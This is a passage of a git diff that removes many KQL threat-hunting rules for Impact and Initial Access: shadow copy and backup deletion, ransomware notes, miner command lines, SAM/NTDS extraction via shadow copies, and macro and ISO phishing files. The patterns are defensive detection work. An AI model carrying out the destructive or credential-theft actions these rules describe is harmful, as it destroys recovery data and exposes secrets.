-| where RegistryValueData =~ "Binary Data" and (RegistryKey contains "\\SOFTWARE\\Microsoft\\SystemCertificates\\Root\\Certificates" or RegistryKey contains "\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates" or RegistryKey contains "\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates" or RegistryKey contains "\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates" or RegistryKey contains "\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates" or RegistryKey contains "\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates" or RegistryKey contains "\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates" or RegistryKey contains "\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates" or RegistryKey contains "\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\AuthRoot\\Certificates") and RegistryKey endswith "\\Blob"
\ No newline at end of file
diff --git a/Impact/Portable_Gpg.EXE_Execution.kql b/Impact/Portable_Gpg.EXE_Execution.kql
deleted file mode 100644
index a096491b..00000000
--- a/Impact/Portable_Gpg.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/06
-// Level: medium
-// Description: Detects the execution of "gpg.exe" from uncommon location. Often used by ransomware and loaders to decrypt/encrypt data.
-// Tags: attack.impact, attack.t1486
-DeviceProcessEvents
-| where ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoOriginalFileName =~ "gpg.exe" or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool") and (not((FolderPath contains ":\\Program Files (x86)\\GNU\\GnuPG\\bin\\" or FolderPath contains ":\\Program Files (x86)\\GnuPG VS-Desktop\\" or FolderPath contains ":\\Program Files (x86)\\GnuPG\\bin\\" or FolderPath contains ":\\Program Files (x86)\\Gpg4win\\bin\\")))
\ No newline at end of file
diff --git a/Impact/Potential_Active_Directory_Enumeration_Using_AD_Module_-_ProcCreation.kql b/Impact/Potential_Active_Directory_Enumeration_Using_AD_Module_-_ProcCreation.kql
deleted file mode 100644
index 3f12168b..00000000
--- a/Impact/Potential_Active_Directory_Enumeration_Using_AD_Module_-_ProcCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2023/01/22
-// Level: medium
-// Description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration.
-// Tags: attack.reconnaissance, attack.discovery, attack.impact
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo ") and ProcessCommandLine contains "Microsoft.ActiveDirectory.Management.dll" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Impact/Potential_Crypto_Mining_Activity.kql b/Impact/Potential_Crypto_Mining_Activity.kql
deleted file mode 100644
index db2ab577..00000000
--- a/Impact/Potential_Crypto_Mining_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/10/26
-// Level: high
-// Description: Detects command line parameters or strings often used by crypto miners
-// Tags: attack.impact, attack.t1496
-DeviceProcessEvents
-| where (ProcessCommandLine contains " --cpu-priority=" or ProcessCommandLine contains "--donate-level=0" or ProcessCommandLine contains " -o pool." or ProcessCommandLine contains " --nicehash" or ProcessCommandLine contains " --algo=rx/0 " or ProcessCommandLine contains "stratum+tcp://" or ProcessCommandLine contains "stratum+udp://" or ProcessCommandLine contains "LS1kb25hdGUtbGV2ZWw9" or ProcessCommandLine contains "0tZG9uYXRlLWxldmVsP" or ProcessCommandLine contains "tLWRvbmF0ZS1sZXZlbD" or ProcessCommandLine contains "c3RyYXR1bSt0Y3A6Ly" or ProcessCommandLine contains "N0cmF0dW0rdGNwOi8v" or ProcessCommandLine contains "zdHJhdHVtK3RjcDovL" or ProcessCommandLine contains "c3RyYXR1bSt1ZHA6Ly" or ProcessCommandLine contains "N0cmF0dW0rdWRwOi8v" or ProcessCommandLine contains "zdHJhdHVtK3VkcDovL") and (not((ProcessCommandLine contains " pool.c " or ProcessCommandLine contains " pool.o " or ProcessCommandLine contains "gcc -")))
\ No newline at end of file
diff --git a/Impact/Potential_File_Overwrite_Via_Sysinternals_SDelete.kql b/Impact/Potential_File_Overwrite_Via_Sysinternals_SDelete.kql
deleted file mode 100644
index c44fdf46..00000000
--- a/Impact/Potential_File_Overwrite_Via_Sysinternals_SDelete.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/06/03
-// Level: high
-// Description: Detects the use of SDelete to erase a file not the free space
-// Tags: attack.impact, attack.t1485
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "sdelete.exe" and (not((ProcessCommandLine contains " -h" or ProcessCommandLine contains " -c" or ProcessCommandLine contains " -z" or ProcessCommandLine contains " /?")))
\ No newline at end of file
diff --git a/Impact/Potential_Ransomware_Activity_Using_LegalNotice_Message.kql b/Impact/Potential_Ransomware_Activity_Using_LegalNotice_Message.kql
deleted file mode 100644
index d3f81814..00000000
--- a/Impact/Potential_Ransomware_Activity_Using_LegalNotice_Message.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/11
-// Level: high
-// Description: Detect changes to the "LegalNoticeCaption" or "LegalNoticeText" registry values where the message set contains keywords often used in ransomware ransom messages
-// Tags: attack.impact, attack.t1491.001
-DeviceRegistryEvents
-| where (RegistryValueData contains "encrypted" or RegistryValueData contains "Unlock-Password" or RegistryValueData contains "paying") and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LegalNoticeCaption" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LegalNoticeText")
\ No newline at end of file
diff --git a/Impact/Potentially_Suspicious_Desktop_Background_Change_Using_Reg.EXE.kql b/Impact/Potentially_Suspicious_Desktop_Background_Change_Using_Reg.EXE.kql
deleted file mode 100644
index 04a1ecbd..00000000
--- a/Impact/Potentially_Suspicious_Desktop_Background_Change_Using_Reg.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Stephen Lincoln @slincoln-aiq (AttackIQ)
-// Date: 2023/12/21
-// Level: medium
-// Description: Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background.
-This is a common technique used by malware to change the desktop background to a ransom note or other image.
-
-// Tags: attack.defense_evasion, attack.impact, attack.t1112, attack.t1491.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "add" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) and (ProcessCommandLine contains "Control Panel\\Desktop" or ProcessCommandLine contains "CurrentVersion\\Policies\\ActiveDesktop" or ProcessCommandLine contains "CurrentVersion\\Policies\\System") and ((ProcessCommandLine contains "/v NoChangingWallpaper" and ProcessCommandLine contains "/d 1") or (ProcessCommandLine contains "/v Wallpaper" and ProcessCommandLine contains "/t REG_SZ") or (ProcessCommandLine contains "/v WallpaperStyle" and ProcessCommandLine contains "/d 2"))
\ No newline at end of file
diff --git a/Impact/Potentially_Suspicious_Desktop_Background_Change_Via_Registry.kql b/Impact/Potentially_Suspicious_Desktop_Background_Change_Via_Registry.kql
deleted file mode 100644
index ea293a77..00000000
--- a/Impact/Potentially_Suspicious_Desktop_Background_Change_Via_Registry.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Stephen Lincoln @slincoln-aiq (AttackIQ)
-// Date: 2023/12/21
-// Level: medium
-// Description: Detects regsitry value settings that would replace the user's desktop background.
-This is a common technique used by malware to change the desktop background to a ransom note or other image.
-
-// Tags: attack.defense_evasion, attack.impact, attack.t1112, attack.t1491.001
-DeviceRegistryEvents
-| where (RegistryKey contains "Control Panel\\Desktop" or RegistryKey contains "CurrentVersion\\Policies\\ActiveDesktop" or RegistryKey contains "CurrentVersion\\Policies\\System") and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "NoChangingWallpaper") or RegistryKey endswith "\\Wallpaper" or (RegistryValueData =~ "2" and RegistryKey endswith "\\WallpaperStyle")) and (not(InitiatingProcessFolderPath endswith "\\svchost.exe"))
\ No newline at end of file
diff --git a/Impact/Registry_Disable_System_Restore.kql b/Impact/Registry_Disable_System_Restore.kql
deleted file mode 100644
index 987d2564..00000000
--- a/Impact/Registry_Disable_System_Restore.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/04/04
-// Level: high
-// Description: Detects the modification of the registry to disable a system restore on the computer
-// Tags: attack.impact, attack.t1490
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey contains "\\Policies\\Microsoft\\Windows NT\\SystemRestore" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore") and (RegistryKey endswith "DisableConfig" or RegistryKey endswith "DisableSR")
\ No newline at end of file
diff --git a/Impact/Renamed_Gpg.EXE_Execution.kql b/Impact/Renamed_Gpg.EXE_Execution.kql
deleted file mode 100644
index 8b2e50af..00000000
--- a/Impact/Renamed_Gpg.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2023/08/09
-// Level: high
-// Description: Detects the execution of a renamed "gpg.exe". Often used by ransomware and loaders to decrypt/encrypt data.
-// Tags: attack.impact, attack.t1486
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "gpg.exe" and (not((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe")))
\ No newline at end of file
diff --git a/Impact/Renamed_Sysinternals_Sdelete_Execution.kql b/Impact/Renamed_Sysinternals_Sdelete_Execution.kql
deleted file mode 100644
index 85f47581..00000000
--- a/Impact/Renamed_Sysinternals_Sdelete_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/09/06
-// Level: high
-// Description: Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)
-// Tags: attack.impact, attack.t1485
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "sdelete.exe" and (not((FolderPath endswith "\\sdelete.exe" or FolderPath endswith "\\sdelete64.exe")))
\ No newline at end of file
diff --git a/Impact/Sensitive_File_Access_Via_Volume_Shadow_Copy_Backup.kql b/Impact/Sensitive_File_Access_Via_Volume_Shadow_Copy_Backup.kql
deleted file mode 100644
index 61901361..00000000
--- a/Impact/Sensitive_File_Access_Via_Volume_Shadow_Copy_Backup.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
-// Date: 2021/08/09
-// Level: high
-// Description: Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit)
-
-// Tags: attack.impact, attack.t1490
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy" and (ProcessCommandLine contains "\\NTDS.dit" or ProcessCommandLine contains "\\SYSTEM" or ProcessCommandLine contains "\\SECURITY")
\ No newline at end of file
diff --git a/Impact/Shadow_Copies_Deletion_Using_Operating_Systems_Utilities.kql b/Impact/Shadow_Copies_Deletion_Using_Operating_Systems_Utilities.kql
deleted file mode 100644
index ef8ae60e..00000000
--- a/Impact/Shadow_Copies_Deletion_Using_Operating_Systems_Utilities.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)
-// Date: 2019/10/22
-// Level: high
-// Description: Shadow Copies deletion using operating systems utilities
-// Tags: attack.defense_evasion, attack.impact, attack.t1070, attack.t1490
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "shadow" and ProcessCommandLine contains "delete") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\diskshadow.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "wmic.exe", "VSSADMIN.EXE", "diskshadow.exe")))) or ((ProcessCommandLine contains "delete" and ProcessCommandLine contains "catalog" and ProcessCommandLine contains "quiet") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")) or (((ProcessCommandLine contains "unbounded" or ProcessCommandLine contains "/MaxSize=") and (ProcessCommandLine contains "resize" and ProcessCommandLine contains "shadowstorage")) and (FolderPath endswith "\\vssadmin.exe" or ProcessVersionInfoOriginalFileName =~ "VSSADMIN.EXE"))
\ No newline at end of file
diff --git a/Impact/Stop_Windows_Service_Via_Net.EXE.kql b/Impact/Stop_Windows_Service_Via_Net.EXE.kql
deleted file mode 100644
index b06abb2a..00000000
--- a/Impact/Stop_Windows_Service_Via_Net.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/05
-// Level: low
-// Description: Detects the stopping of a Windows service via the "net" utility.
-// Tags: attack.impact, attack.t1489
-DeviceProcessEvents
-| where ProcessCommandLine contains " stop " and ((ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe"))
\ No newline at end of file
diff --git a/Impact/Stop_Windows_Service_Via_PowerShell_Stop-Service.kql b/Impact/Stop_Windows_Service_Via_PowerShell_Stop-Service.kql
deleted file mode 100644
index d8555ff2..00000000
--- a/Impact/Stop_Windows_Service_Via_PowerShell_Stop-Service.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/05
-// Level: low
-// Description: Detects the stopping of a Windows service via the PowerShell Cmdlet "Stop-Service"
-// Tags: attack.impact, attack.t1489
-DeviceProcessEvents
-| where ProcessCommandLine contains "Stop-Service " and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))
\ No newline at end of file
diff --git a/Impact/Stop_Windows_Service_Via_Sc.EXE.kql b/Impact/Stop_Windows_Service_Via_Sc.EXE.kql
deleted file mode 100644
index c9c45332..00000000
--- a/Impact/Stop_Windows_Service_Via_Sc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/05
-// Level: low
-// Description: Detects the stopping of a Windows service via the "sc.exe" utility
-// Tags: attack.impact, attack.t1489
-DeviceProcessEvents
-| where ProcessCommandLine contains " stop " and (ProcessVersionInfoOriginalFileName =~ "sc.exe" or FolderPath endswith "\\sc.exe")
\ No newline at end of file
diff --git a/Impact/Suspicious_Creation_TXT_File_in_User_Desktop.kql b/Impact/Suspicious_Creation_TXT_File_in_User_Desktop.kql
deleted file mode 100644
index 14243c8b..00000000
--- a/Impact/Suspicious_Creation_TXT_File_in_User_Desktop.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/26
-// Level: high
-// Description: Ransomware create txt file in the user Desktop
-// Tags: attack.impact, attack.t1486
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\cmd.exe" and (FolderPath contains "\\Users\\" and FolderPath contains "\\Desktop\\") and FolderPath endswith ".txt"
\ No newline at end of file
diff --git a/Impact/Suspicious_Execution_of_Shutdown.kql b/Impact/Suspicious_Execution_of_Shutdown.kql
deleted file mode 100644
index 1b1bcf08..00000000
--- a/Impact/Suspicious_Execution_of_Shutdown.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/01
-// Level: medium
-// Description: Use of the commandline to shutdown or reboot windows
-// Tags: attack.impact, attack.t1529
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/r " or ProcessCommandLine contains "/s ") and FolderPath endswith "\\shutdown.exe"
\ No newline at end of file
diff --git a/Impact/Suspicious_Execution_of_Shutdown_to_Log_Out.kql b/Impact/Suspicious_Execution_of_Shutdown_to_Log_Out.kql
deleted file mode 100644
index 7c380a20..00000000
--- a/Impact/Suspicious_Execution_of_Shutdown_to_Log_Out.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/10/01
-// Level: medium
-// Description: Detects the rare use of the command line tool shutdown to logoff a user
-// Tags: attack.impact, attack.t1529
-DeviceProcessEvents
-| where ProcessCommandLine contains "/l" and FolderPath endswith "\\shutdown.exe"
\ No newline at end of file
diff --git a/Impact/Suspicious_Reg_Add_BitLocker.kql b/Impact/Suspicious_Reg_Add_BitLocker.kql
deleted file mode 100644
index 9acc3570..00000000
--- a/Impact/Suspicious_Reg_Add_BitLocker.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/11/15
-// Level: high
-// Description: Detects suspicious addition to BitLocker related registry keys via the reg.exe utility
-// Tags: attack.impact, attack.t1486
-DeviceProcessEvents
-| where (ProcessCommandLine contains "EnableBDEWithNoTPM" or ProcessCommandLine contains "UseAdvancedStartup" or ProcessCommandLine contains "UseTPM" or ProcessCommandLine contains "UseTPMKey" or ProcessCommandLine contains "UseTPMKeyPIN" or ProcessCommandLine contains "RecoveryKeyMessageSource" or ProcessCommandLine contains "UseTPMPIN" or ProcessCommandLine contains "RecoveryKeyMessage") and (ProcessCommandLine contains "REG" and ProcessCommandLine contains "ADD" and ProcessCommandLine contains "\\SOFTWARE\\Policies\\Microsoft\\FVE" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "/f")
\ No newline at end of file
diff --git a/Impact/Suspicious_Volume_Shadow_Copy_VSS_PS.dll_Load.kql b/Impact/Suspicious_Volume_Shadow_Copy_VSS_PS.dll_Load.kql
deleted file mode 100644
index 714a3039..00000000
--- a/Impact/Suspicious_Volume_Shadow_Copy_VSS_PS.dll_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis, @markus_neis
-// Date: 2021/07/07
-// Level: high
-// Description: Detects the image load of vss_ps.dll by uncommon executables
-// Tags: attack.defense_evasion, attack.impact, attack.t1490
-DeviceImageLoadEvents
-| where FolderPath endswith "\\vss_ps.dll" and (not((isnull(InitiatingProcessFolderPath) or ((InitiatingProcessFolderPath endswith "\\clussvc.exe" or InitiatingProcessFolderPath endswith "\\dismhost.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\inetsrv\\appcmd.exe" or InitiatingProcessFolderPath endswith "\\inetsrv\\iissetup.exe" or InitiatingProcessFolderPath endswith "\\msiexec.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\searchindexer.exe" or InitiatingProcessFolderPath endswith "\\srtasks.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\System32\\SystemPropertiesAdvanced.exe" or InitiatingProcessFolderPath endswith "\\taskhostw.exe" or InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\tiworker.exe" or InitiatingProcessFolderPath endswith "\\vssvc.exe" or InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe" or InitiatingProcessFolderPath endswith "\\wsmprovhost.exe") and InitiatingProcessFolderPath startswith "C:\\Windows\\") or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or (InitiatingProcessCommandLine contains "\\dismhost.exe {" and InitiatingProcessCommandLine startswith "C:\\$WinREAgent\\Scratch\\"))))
\ No newline at end of file
diff --git a/Impact/Suspicious_Volume_Shadow_Copy_Vssapi.dll_Load.kql b/Impact/Suspicious_Volume_Shadow_Copy_Vssapi.dll_Load.kql
deleted file mode 100644
index 76697076..00000000
--- a/Impact/Suspicious_Volume_Shadow_Copy_Vssapi.dll_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/10/31
-// Level: high
-// Description: Detects the image load of VSS DLL by uncommon executables
-// Tags: attack.defense_evasion, attack.impact, attack.t1490
-DeviceImageLoadEvents
-| where FolderPath endswith "\\vssapi.dll" and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache\\" or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\{" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\")))))
\ No newline at end of file
diff --git a/Impact/Suspicious_Volume_Shadow_Copy_Vsstrace.dll_Load.kql b/Impact/Suspicious_Volume_Shadow_Copy_Vsstrace.dll_Load.kql
deleted file mode 100644
index ddc53c62..00000000
--- a/Impact/Suspicious_Volume_Shadow_Copy_Vsstrace.dll_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2023/02/17
-// Level: high
-// Description: Detects the image load of VSS DLL by uncommon executables
-// Tags: attack.defense_evasion, attack.impact, attack.t1490
-DeviceImageLoadEvents
-| where FolderPath endswith "\\vsstrace.dll" and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\{" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\")))))
\ No newline at end of file
diff --git a/Impact/Windows_Backup_Deleted_Via_Wbadmin.EXE.kql b/Impact/Windows_Backup_Deleted_Via_Wbadmin.EXE.kql
deleted file mode 100644
index 6e4d7eae..00000000
--- a/Impact/Windows_Backup_Deleted_Via_Wbadmin.EXE.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/12/13
-// Level: medium
-// Description: Detects the deletion of backups or system state backups via "wbadmin.exe".
-This technique is used by numerous ransomware families and actors.
-This may only be successful on server platforms that have Windows Backup enabled.
-
-// Tags: attack.impact, attack.t1490
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "delete " and ProcessCommandLine contains "backup") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")) and (not(ProcessCommandLine contains "keepVersions:0"))
\ No newline at end of file
diff --git a/Initial Access/Arbitrary_Shell_Command_Execution_Via_Settingcontent-Ms.kql b/Initial Access/Arbitrary_Shell_Command_Execution_Via_Settingcontent-Ms.kql
deleted file mode 100644
index c2a5c681..00000000
--- a/Initial Access/Arbitrary_Shell_Command_Execution_Via_Settingcontent-Ms.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sreeman
-// Date: 2020/03/13
-// Level: medium
-// Description: The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.
-// Tags: attack.t1204, attack.t1566.001, attack.execution, attack.initial_access
-DeviceProcessEvents
-| where ProcessCommandLine contains ".SettingContent-ms" and (not(ProcessCommandLine contains "immersivecontrolpanel"))
\ No newline at end of file
diff --git a/Initial Access/HTML_Help_HH.EXE_Suspicious_Child_Process.kql b/Initial Access/HTML_Help_HH.EXE_Suspicious_Child_Process.kql
deleted file mode 100644
index 25771e32..00000000
--- a/Initial Access/HTML_Help_HH.EXE_Suspicious_Child_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/04/01
-// Level: high
-// Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
-// Tags: attack.defense_evasion, attack.execution, attack.initial_access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001
-DeviceProcessEvents
-| where (FolderPath endswith "\\CertReq.exe" or FolderPath endswith "\\CertUtil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\MSbuild.exe" or FolderPath endswith "\\MSHTA.EXE" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\hh.exe"
\ No newline at end of file
diff --git a/Initial Access/ISO_File_Created_Within_Temp_Folders.kql b/Initial Access/ISO_File_Created_Within_Temp_Folders.kql
deleted file mode 100644
index faa3924b..00000000
--- a/Initial Access/ISO_File_Created_Within_Temp_Folders.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @sam0x90
-// Date: 2022/07/30
-// Level: high
-// Description: Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.
-// Tags: attack.initial_access, attack.t1566.001
-DeviceFileEvents
-| where ((FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath contains ".zip\\") and FolderPath endswith ".iso") or (FolderPath contains "\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Outlook\\" and FolderPath endswith ".iso")
\ No newline at end of file
diff --git a/Initial Access/ISO_or_Image_Mount_Indicator_in_Recent_Files.kql b/Initial Access/ISO_or_Image_Mount_Indicator_in_Recent_Files.kql
deleted file mode 100644
index ca6ce719..00000000
--- a/Initial Access/ISO_or_Image_Mount_Indicator_in_Recent_Files.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/11
-// Level: medium
-// Description: Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.
-This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.
-
-// Tags: attack.initial_access, attack.t1566.001
-DeviceFileEvents
-| where FolderPath contains "\\Microsoft\\Windows\\Recent\\" and (FolderPath endswith ".iso.lnk" or FolderPath endswith ".img.lnk" or FolderPath endswith ".vhd.lnk" or FolderPath endswith ".vhdx.lnk")
\ No newline at end of file
diff --git a/Initial Access/Office_Macro_File_Creation.kql b/Initial Access/Office_Macro_File_Creation.kql
deleted file mode 100644
index befbebcf..00000000
--- a/Initial Access/Office_Macro_File_Creation.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/01/23
-// Level: low
-// Description: Detects the creation of a new office macro files on the systems
-// Tags: attack.initial_access, attack.t1566.001
-DeviceFileEvents
-| where FolderPath endswith ".docm" or FolderPath endswith ".dotm" or FolderPath endswith ".xlsm" or FolderPath endswith ".xltm" or FolderPath endswith ".potm" or FolderPath endswith ".pptm"
\ No newline at end of file
diff --git a/Initial Access/Office_Macro_File_Creation_From_Suspicious_Process.kql b/Initial Access/Office_Macro_File_Creation_From_Suspicious_Process.kql
deleted file mode 100644
index e74caaca..00000000
--- a/Initial Access/Office_Macro_File_Creation_From_Suspicious_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/01/23
-// Level: high
-// Description: Detects the creation of a office macro file from a a suspicious process
-// Tags: attack.initial_access, attack.t1566.001
-DeviceFileEvents
-| where ((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or (InitiatingProcessParentFileName in~ ("cscript.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe", "wscript.exe"))) and (FolderPath endswith ".docm" or FolderPath endswith ".dotm" or FolderPath endswith ".xlsm" or FolderPath endswith ".xltm" or FolderPath endswith ".potm" or FolderPath endswith ".pptm")
\ No newline at end of file
diff --git a/Initial Access/Office_Macro_File_Download.kql b/Initial Access/Office_Macro_File_Download.kql
deleted file mode 100644
index e589acbc..00000000
--- a/Initial Access/Office_Macro_File_Download.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/01/23
-// Level: medium
